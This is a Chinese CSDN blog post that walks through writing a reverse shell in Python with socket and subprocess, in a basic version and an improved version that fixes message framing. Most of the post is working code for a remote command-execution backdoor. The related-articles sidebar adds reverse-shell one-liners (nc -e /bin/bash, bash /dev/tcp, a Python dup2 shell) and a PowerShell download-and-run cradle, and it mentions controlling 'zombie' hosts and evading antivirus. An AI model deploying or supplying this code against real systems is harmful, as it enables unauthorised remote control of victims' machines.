Python实现反向Shell

最新推荐文章于 2024-05-19 11:09:09 发布
最新推荐文章于 2024-05-19 11:09:09 发布
阅读量417 收藏 12
点赞数 18
文章标签: python 服务器 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xingxsc/article/details/136083246
版权

反向Shell的实现也是可以通过python来实现,接下来会用到socket, subprocess来写。

服务端

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)#设置端口重用
s.bind(('127.0.0.1', 5000))
s.listen(5)

while True:
    conn, addr = s.accept()#等待连接请求
    while True:
        cmd = input('Shell>').strip()
        conn.sendall(cmd.encode('gbk'))#发送命令
        print(conn.recv(1024).decode('gbk'))#接受命令回显

客户端

import socket
import subprocess

c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(('127.0.0.1', 5000))#连接机器

while True:
    cmd = c.recv(1024).decode('gbk')接受命令
    obj = subprocess.Popen(cmd,                     #执行命令并将命令回显放入管道PIPE
                           shell = True,
                           stdout = subprocess.PIPE,
                           stderr = subprocess.PIPE)
    data = obj.stdout.read() + obj.stderr.read()#将管道中的命令回显赋值给data
    c.sendall(data)#发送命令回显

以上就是一个简单的python反向shell案例,但是会在命令回显大量数据的时候出现报错,是因为出现了tcp粘包问题,所以我们需要将命令确定长度后单独接收,也会出现如果你直接按下回车会发送空,但是空代表没有数据那么就不会被发送接收导致客户端收不到任何消息于是就没有任何命令回显,所以会在发送空后阻塞在recv的地方。

以下为改进代码:

服务端

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('127.0.0.1', 5000))
s.listen(5)

while True:
    conn, addr = s.accept()
    while True:
        cmd = input('Shell>').strip()
        if not cmd:#如果命令为空就重新输入
            continue
        conn.sendall(cmd.encode('gbk'))
        cmd_size = int(conn.recv(8).decode('gbk'))#接受命令回显长度
        add_size = 0
        while add_size < cmd_size:#当回显长度达到就跳出循环
            swap = conn.recv(1024)
            add_size += len(swap)
            print(swap.decode('gbk'), end = '')#依次打印每次回显的内容

客户端

import socket
import subprocess

c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(('127.0.0.1', 5000))

while True:
    cmd = c.recv(1024).decode('gbk')
    obj = subprocess.Popen(cmd,
                           shell = True,
                           stdout = subprocess.PIPE,
                           stderr = subprocess.PIPE)
    data = obj.stdout.read() + obj.stderr.read()
    c.sendall(bytes(str(len(data)), 'gbk').zfill(8))#发送命令长度
    c.sendall(data)#再发送数据
xingxsc
关注
  • 18
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Python和nc对远程主机进行反向shell链接
chenjafo的博客
08-15 4136
nc这个命令屌炸天,经常用作黑客工具。简单说下反向shell 2台Linux电脑 A:192.168.0.21 B:192.168.0.22 A设置nc -lv 8081 B执行nc 192.168.0.21 8080 -e /bin/bash 这样就A就可以链接上B计算机的shell 但是-e这个参数默认时候是木有的,甚者nc命令都木有,可以自己下载源代码编译一个,略麻烦 但
Python3实现反向Shell
Pad0y的博客
09-28 2052
很多有名的远程控制工具都是基于C/S结构开发的,比如:灰鸽子、冰河、teamViewer等等。通常情况下是将Client作为控制端,Server作为被控端。这里笔者将采用反向连接的方式,将Server作为控制端,Client作为被控端。当然,这两种方式都可以实现功能。这里我采用反向连接的方式主要是考虑到肉鸡在内网中,我们是无法直接连接到被控端的。如果用反向连接的方式,尽管被控端在内网中,只要我们不在内网中,或者我们做了内网端口映射、动态域
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 4934
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
Python 反向 Shell 代码分析
weixin_46104215的博客
11-27 996
import os,socket,subprocess; s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.110.130',2222)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) s = socket.socket(socket.AF_INET,.
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
python反弹shell_反弹shell的几种方式总结
weixin_34653651的博客
01-15 4120
假设本机地址10.10.10.11,监听端口443。1、Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口nc-lvp443然后在靶机上执行如下命令:bash-i>&/dev/tcp/10.10.10.11/4430>&1/bin/bash-i>/dev/tcp/10.10.10.11/4430&1exec5&l...
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
Reverse_shell_python:反向Shell通过远程计算机将其Shell发送给攻击者来工作
05-12
Python反向外壳此反向外壳程序是由远程计算机将其外壳程序发送给攻击者而工作的。 在此处观看视频教程: : S0Os2hrcPjE&list=
Reverse_DNS_Shell:使用DNS作为c2通道的python反向shell
05-03
DNShell v1.7描述: 使用DNS作为C2通道的Python反向Shell。要求: dnslib DNS服务器隐密Gotchyas: 别忘了更改您的主机别忘了更改您的SECRET密钥首先运行服务器摩尔信息:
Reverse-Shell-with-autorun:在python实现反向shell,包括服务器,客户端和自动运行代码。 从服务器在后台控制客户端PC命令行
04-13
带自动运行的反向外壳 在python实现反向shell,包括服务器,客户端和自动运行代码。 从服务器在后台控制客户端PC命令行
Python3 实现可控制肉鸡的反向Shell
git1314的博客
09-29 810
Python3 实现可控制肉鸡的反向Shell 一、初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为Client主动连接到我们的Server端,以实现对多个远程主机的管理! 学习技能: 了解TCP协议 了解C/S结构程序设计 Python socket模块的使用 Python subprocess模块的...
Python Security 之 反向Shell
不急不躁
07-14 1217
首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。 我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机上面的文件.创建一个python HTTP服务器可以直接使用python的内建函数”SimpleHTTP
Python-基于socket实现反向shell攻击后门
Vimor的博客
09-09 4957
下面给出一个基于socket实现反向shell攻击,或者叫做控制工具吧,简单点说来就是在“受害者”电脑上留一个后门,“攻击者”可以通过这个连接这个socket实现在“受害者”电脑上执行各种指令,再直白一点就是一个socket通信的实例而已。 “受害者“端(后门):backdoor.py,这里充当一个socket服务端程序,主要实现连接的的监听、数据的收发和处理以及指令的执行 #!/u
python反弹shell_windows命令行反弹shell(一)
weixin_33463850的博客
01-29 1196
前言实战中会遇到各种AV,有时候无法直接反弹到msf或CS中。我们可以婉转一些,先反弹到cmd里再想办法bypass。powershell反弹cmdpowercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。被攻击端运行命令powershell IEX (New-Object System.Net.Webclient).DownloadString('https...
python 反向shell 编程
悦信安In4sec
03-14 473
服务端(监听端): 建立套接字编程 绑定端口 监听 连接到后门 发送信息(例如命令whoami之类的) 接收到后门返回的信息后门(客服端): 建立套接字 连接服务器 接收服务器返回的信息 处理后返回给服务器程序: 服务端(监听端):#!/usr/bin/python import socket s = socket.socket(socket.AF_INET,socket.SO
使用Python操作excel单元格——在单元格中插入公式
xll_007的博客
05-16 408
使用Python操作excel单元格——在单元格中插入公式。 通过使用Python的openpyxl库,来操作excel单元格,在单元格中插入公式的操作。把学习的过程分享给大家。大佬勿喷!
geopandas快速入门报错1
最新发布
weixin_45213317的博客
05-19 199
报错:CRSError: Invalid projection: EPSG:4326: (Internal Proj Error: proj_create: no database context specified)解决方法:重新下载适合自己Python版本的pyproj安装。
Gradio 案例——将 dicom 文件转为 nii文件
蒋含竹的博客
05-15 400
Gradio 的WEB界面案例:利用 SimpleITK 库,将 dicom 文件转为 nii文件
使用XPath来解析网页数据
2301_80263861的博客
05-18 773
首先是定位到超链接为“link4.html”的 a 标签,然后向上翻一级,也就是到了 li 元素,然后再查找这个 a 标签对应的 li 的 class 属性值,即最后的输出为[‘item-1’]第一种是访问class属性为“item-0”的 li 标签下的文字,但是在这行代码里面,li 标签的下一级是 a 标签,没有文字,只有换行符,所以输出也就是['\n ']获取class属性值含 “li” 和 name 属性值为 “item” 的 li 标签下的 a 标签的文字部分。
反向shell scapy
08-18
虽然 Scapy 本身没有直接提供反向 shell 的功能,但可以使用它来实现创建和发送网络数据包的自定义代码。 要创建一个反向 shell,你需要编写一些代码来构造一个恶意的网络数据包,并将其发送到目标计算机。这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值